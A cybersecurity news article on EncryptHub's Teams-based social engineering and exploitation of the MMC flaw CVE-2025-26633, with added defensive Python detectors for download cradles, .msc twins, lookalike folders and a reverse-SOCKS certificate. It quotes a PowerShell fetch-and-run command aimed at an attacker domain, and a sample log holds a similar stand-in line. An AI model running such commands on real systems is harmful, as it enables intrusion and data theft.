Red Hot Cyber


Did you respond to IT support on Teams? Congratulations! The Trojan is on your PC with rights that exceed yours.

Redazione RHC : 15 August 2025 14:42

The research team at Trustwave SpiderLabs has identified a new wave of EncryptHub attacks that combine human error with the exploitation of a vulnerability in the Microsoft Management Console (MMC). Operators pose as support staff, contact employees via Microsoft Teams, and convince the "customer" to open remote access and run a series of commands before deploying the payload for CVE-2025-26633, known as MSC EvilTwin.

At the same time, the group uses non-standard distribution channels, including the Brave support platform, which complicates traffic filtering and incident analysis. Reports also list other names for the same team: LARVA-208 and Water Gamayun. Previously, the group had been associated with attacks on Web3 developers and abuse of the Steam platform, and as of February 618 organizations worldwide had been compromised.

The first step is social engineering. The victim receives a Teams request from an "IT person," who then insistently offers to start a remote session and "check settings." Once the session is established, a line like this is executed on the machine:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://cjhsbam[.]com/payload/runner.ps1' | Invoke-Expression"

This call downloads and executes the runner.ps1 script, which serves as the springboard for exploiting the MMC vulnerability.
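The one-liner above is a classic download cradle, and its building blocks (execution-policy bypass, hidden window, a remote fetch piped into Invoke-Expression) survive renaming of the script and domain. As an added example, not code from the article or from Trustwave, the following Python detection runs over a few constructed process-creation records; the pipe-separated field layout (timestamp, host, parent image, command line) is an assumption, not a real sensor format, and only the first record is the command quoted in the article.

```python
"""Detect PowerShell download-cradle command lines in process-creation logs.

Added example, not from the article or Trustwave. Records are constructed;
the "ts|host|parent_image|command_line" layout is an assumption.
"""
import re

# Constructed sample records. Only the first one is the command line quoted in the article.
SAMPLE_LOG = """\
2025-08-15T10:01:02Z|WS-0413|C:\\Program Files\\Teams\\Teams.exe|powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://cjhsbam[.]com/payload/runner.ps1' | Invoke-Expression"
2025-08-15T10:05:40Z|WS-0413|C:\\Windows\\explorer.exe|powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"
2025-08-15T10:07:11Z|WS-0220|C:\\Windows\\System32\\svchost.exe|powershell.exe -ep bypass -w hidden -c "iex (irm http://example.invalid/stage.ps1)"
2025-08-15T10:09:00Z|WS-0220|C:\\Windows\\explorer.exe|notepad.exe C:\\Users\\a\\notes.txt"""

# Each indicator also matches the common short aliases (-ep, -w, irm, iwr, iex).
PATTERNS = {
    "execution_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep|ex)\s+bypass", re.I),
    "hidden_window": re.compile(r"-(?:WindowStyle|w)\s+hidden", re.I),
    "remote_fetch": re.compile(r"\b(?:Invoke-RestMethod|irm|Invoke-WebRequest|iwr|DownloadString)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
}
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def parse_line(line):
    """Split one constructed record into its four fields."""
    ts, host, parent, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "parent": parent, "cmd": cmd}


def score(record):
    """Return the names of all indicators present in a PowerShell command line."""
    if not POWERSHELL.search(record["cmd"]):
        return []
    return [name for name, rx in PATTERNS.items() if rx.search(record["cmd"])]


def detect(log_text):
    """Return the records that look like a download cradle.

    A remote fetch piped into in-memory execution is the cradle itself, so that pair
    alone is enough; otherwise require three of the four indicators to limit noise
    from admin scripts that merely set -ExecutionPolicy Bypass.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        reasons = score(rec)
        if {"remote_fetch", "in_memory_exec"} <= set(reasons) or len(reasons) >= 3:
            rec["reasons"] = reasons
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ts"], hit["host"], "parent=" + hit["parent"], ",".join(hit["reasons"]))
```

The parent image is kept in the output on purpose: a cradle spawned from a collaboration or remote-support client, as in the Teams scenario above, deserves a higher priority than the same string typed into a console by an administrator.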

Then comes the trick with duplicate .msc files. The loader creates two console files with the same name: a "clean" copy is placed in the expected directory, and a malicious copy is placed in the MUIPath location, usually the en-US subdirectory. When the legitimate snap-in is launched, the mmc.exe process starts and, because of the MSC EvilTwin bug, first looks for a file with the same name in MUIPath. As a result, the system picks up the "mirror" from en-US and executes the attackers' code. Although the flaw was publicly described as a zero-day in March 2025, samples of such files were found in active attacks as early as February. A patch exists, but the technique still works on unpatched machines.

After the duplicates are in place, runner.ps1 modifies the contents of the malicious snap-in: the htmlLoaderUrl placeholder is replaced with the address of the EncryptHub command-and-control node, a string like hxxps://cjhsbam[.]com/payload/build[.]ps1. Once it has the link, the .msc executes the next stage.
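The two steps above leave a distinctive artifact on disk: an .msc file next to a same-named .msc in the directory's language subfolder, with different contents. As an added example, not code from the article or from Trustwave, the Python scanner below walks a directory tree, reports every such pair and compares their hashes. The sample tree it builds is constructed; the set of language folders to check (only en-US here) and the assumption that a differing twin is worth review rather than proof of compromise are mine, since a legitimately localized copy would need allowlisting.

```python
"""Hunt for MSC EvilTwin-style snap-in pairs: an .msc whose directory also holds a
same-named .msc in a MUI language subfolder such as en-US.

Added example, not from the article or Trustwave. Works on any tree (a live
Windows volume or a copied-out sample); the sample tree below is constructed.
"""
import hashlib
import os
import tempfile

# Language subfolders that MUIPath resolution may consult. Assumption: only en-US,
# as in the article; add other locales used in your estate.
MUI_DIRS = {"en-us"}


def sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def find_msc_twins(root):
    """Return (expected_path, twin_path, same_content) for every .msc with a MUI twin."""
    twins = []
    for dirpath, dirnames, filenames in os.walk(root):
        mui = [d for d in dirnames if d.lower() in MUI_DIRS]
        if not mui:
            continue
        for name in filenames:
            if not name.lower().endswith(".msc"):
                continue
            expected = os.path.join(dirpath, name)
            for d in mui:
                twin = os.path.join(dirpath, d, name)
                if os.path.isfile(twin):
                    twins.append((expected, twin, sha256(expected) == sha256(twin)))
    return twins


def build_sample_tree():
    """Constructed tree: a clean WF.msc beside an en-US twin with different bytes,
    plus services.msc with no twin. Returns the temp root."""
    root = tempfile.mkdtemp(prefix="msc_twin_")
    sys32 = os.path.join(root, "System32")
    os.makedirs(os.path.join(sys32, "en-US"))
    with open(os.path.join(sys32, "WF.msc"), "w") as f:
        f.write("<MMC_ConsoleFile>clean console</MMC_ConsoleFile>")
    with open(os.path.join(sys32, "en-US", "WF.msc"), "w") as f:
        f.write("<MMC_ConsoleFile>htmlLoaderUrl placeholder</MMC_ConsoleFile>")
    with open(os.path.join(sys32, "services.msc"), "w") as f:
        f.write("<MMC_ConsoleFile>services</MMC_ConsoleFile>")
    return root


if __name__ == "__main__":
    for expected, twin, same in find_msc_twins(build_sample_tree()):
        verdict = "identical" if same else "DIFFERENT CONTENT - review"
        print(expected, "<->", twin, verdict)
```

Run it against a real volume by replacing build_sample_tree() with the path to scan; a twin pair whose hashes differ is the signal described above, and the twin's contents can then be checked for a loader URL where htmlLoaderUrl would have been substituted.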

The build.ps1 script collects system fingerprints and sends them to the C2, registers a persistence (autorun) mechanism, manages the communication channel, and waits for tasks to execute. Commands arrive AES-encrypted, are decrypted locally, and are executed directly on the host via Invoke-Expression. Typical modules include Fickle Stealer, a PowerShell stealer that extracts sensitive files, environment information, and cryptocurrency wallet data.

During the investigation, additional Go tools emerged, with which the operators are gradually replacing their PowerShell scripts. One of them, SilentCrystal, replicates the loader logic but is compiled into a native binary. First, a pseudo-system folder "C:\Windows \System32" is created, with a space after the word "Windows," which visually mimics the real directory and confuses security tools. Then the sample sends a POST to the control server with a hard-coded "API key" and a random filename with a .zip extension; in response, a legitimate Brave support link is returned.

New users aren't allowed to upload attachments to that site, which means EncryptHub has an account with upload rights. The archive is downloaded from Brave support and unpacked, after which the {URI} placeholder in WF.msc is replaced with the command-center address. Next, the standard .msc is launched, and thanks to CVE-2025-26633 the console picks up the substitute from the "false" directory and executes the requested code.
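The "Windows " folder with a trailing space is easy to miss by eye but easy to find programmatically: it collides with a sibling once whitespace and case are normalized, and a whitespace-padded name is unusual on its own because ordinary Win32 path handling strips trailing spaces from path components. As an added example, not code from the article or from Trustwave, the Python scanner below lists sibling directories that collapse to the same canonical name and any name with leading or trailing whitespace; it also folds Unicode compatibility forms, which goes slightly beyond the article's case. The tree it inspects is constructed in a temporary directory.

```python
"""Find lookalike directories such as "C:\\Windows \\System32" (trailing space after Windows).

Added example, not from the article or Trustwave. The sample tree is constructed;
depth limit and the NFKC/case folding are my choices.
"""
import os
import tempfile
import unicodedata


def canonical(name):
    """Collapse the tricks that make two names look identical: surrounding whitespace,
    letter case, and Unicode compatibility forms (e.g. full-width letters)."""
    return unicodedata.normalize("NFKC", name).strip().casefold()


def find_lookalike_dirs(root, max_depth=2):
    """Return findings of the form {"parent", "names", "whitespace_padded"}.

    A finding is raised when two or more sibling directories share a canonical name,
    or when a single directory name carries leading/trailing whitespace.
    """
    findings = []
    root_depth = root.rstrip(os.sep).count(os.sep)
    for dirpath, dirnames, _ in os.walk(root):
        if dirpath.count(os.sep) - root_depth >= max_depth:
            dirnames[:] = []  # do not descend further; the lookalike sits high in the tree
            continue
        by_canon = {}
        for d in dirnames:
            by_canon.setdefault(canonical(d), []).append(d)
        for names in by_canon.values():
            padded = [n for n in names if n != n.strip()]
            if len(names) > 1 or padded:
                findings.append({"parent": dirpath, "names": sorted(names),
                                 "whitespace_padded": padded})
    return findings


def build_lookalike_tree():
    """Constructed volume layout: the real Windows\\System32, a 'Windows \\System32'
    twin with a trailing space, and an unrelated Users folder."""
    root = tempfile.mkdtemp(prefix="lookalike_")
    os.makedirs(os.path.join(root, "Windows", "System32"))
    os.makedirs(os.path.join(root, "Windows ", "System32"))
    os.makedirs(os.path.join(root, "Users"))
    return root


if __name__ == "__main__":
    for f in find_lookalike_dirs(build_lookalike_tree()):
        print(f["parent"], [repr(n) for n in f["names"]], "padded:", f["whitespace_padded"])
```

Names are printed with repr() so the trailing space is visible in the output; on a real host, point the function at the volume root (e.g. "C:\\") rather than at the constructed tree.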

Another interesting discovery is a "bookmark proxy" in Go with SOCKS5 support. Without parameters, it starts as a client, connects to the attackers' "hosting" using details hard-coded in the binary, and diverts traffic through a tunnel. There is also a server mode: a file with authentication data is loaded, a self-signed TLS certificate is generated automatically (the Common Name field contains the string Reverse Socks and the DNS name is localhost), after which the process begins accepting multiple connections, parallelizing processing via goroutines. When a connection is established, the agent reports to Telegram with the "start" state, filling in the username, the domain from the USERDOMAIN environment variable, the result of checking for administrative rights via a network session call, as well as the public IP, geolocation, and provider obtained from https://ipinfo.io/json. Infrastructure analysis revealed payload requests to hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, another piece of the C2 framework.
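The certificate details above (self-signed, Common Name "Reverse Socks", DNS name localhost) are a network-side fingerprint that survives a change of hosting. As an added example, not code from the article or from Trustwave, the Python check below runs over a few constructed TLS-handshake records and flags the exact CN as a strong match, and a self-signed certificate naming localhost presented by a non-loopback peer as a weaker one. The tab-separated column layout is an assumption, not a real sensor format, and all addresses are from documentation ranges.

```python
"""Flag TLS sessions whose server certificate matches the Go reverse-SOCKS server
described above.

Added example, not from the article or Trustwave. Records are constructed; the
tab-separated ts/src/dst/dport/subject/issuer/san layout is an assumption.
"""
import ipaddress

SAMPLE_SSL_LOG = """\
ts\tsrc\tdst\tdport\tsubject\tissuer\tsan
1755259262.1\t10.0.4.13\t203.0.113.57\t443\tCN=Reverse Socks\tCN=Reverse Socks\tlocalhost
1755259290.7\t10.0.4.13\t198.51.100.20\t443\tCN=www.example.com\tCN=Some Public CA\twww.example.com,example.com
1755259301.2\t10.0.4.20\t127.0.0.1\t8443\tCN=localhost\tCN=localhost\tlocalhost
1755259333.9\t10.0.4.20\t198.51.100.9\t8443\tCN=dev-box\tCN=dev-box\tlocalhost"""


def parse_records(text):
    """Header row names the columns; each following row becomes a dict."""
    lines = text.splitlines()
    header = lines[0].split("\t")
    return [dict(zip(header, line.split("\t"))) for line in lines[1:]]


def cn_of(dn):
    """Extract the CN attribute from a comma-separated distinguished name."""
    for part in dn.split(","):
        key, _, value = part.strip().partition("=")
        if key.strip().upper() == "CN":
            return value.strip()
    return ""


def assess(rec):
    """Return the list of reasons a record is suspicious (empty if none)."""
    reasons = []
    subject, issuer = rec["subject"], rec["issuer"]
    sans = [s.strip().lower() for s in rec["san"].split(",") if s.strip()]
    self_signed = subject == issuer
    peer_loopback = ipaddress.ip_address(rec["dst"]).is_loopback
    if cn_of(subject).lower() == "reverse socks":
        reasons.append("cn_reverse_socks")  # exact fingerprint from the sample
    if self_signed and "localhost" in sans and not peer_loopback:
        # A throwaway cert that only names localhost has no business on a remote host.
        reasons.append("self_signed_localhost_cert_on_remote_peer")
    return reasons


def find_suspicious(text):
    hits = []
    for rec in parse_records(text):
        reasons = assess(rec)
        if reasons:
            hits.append({**rec, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_SSL_LOG):
        print(hit["src"], "->", hit["dst"] + ":" + hit["dport"], hit["subject"], ",".join(hit["reasons"]))
```

The third record (a self-signed localhost certificate on 127.0.0.1) is deliberately left unflagged: local development servers look exactly like that, and the loopback check is what keeps the weaker rule from drowning the strong one.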

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
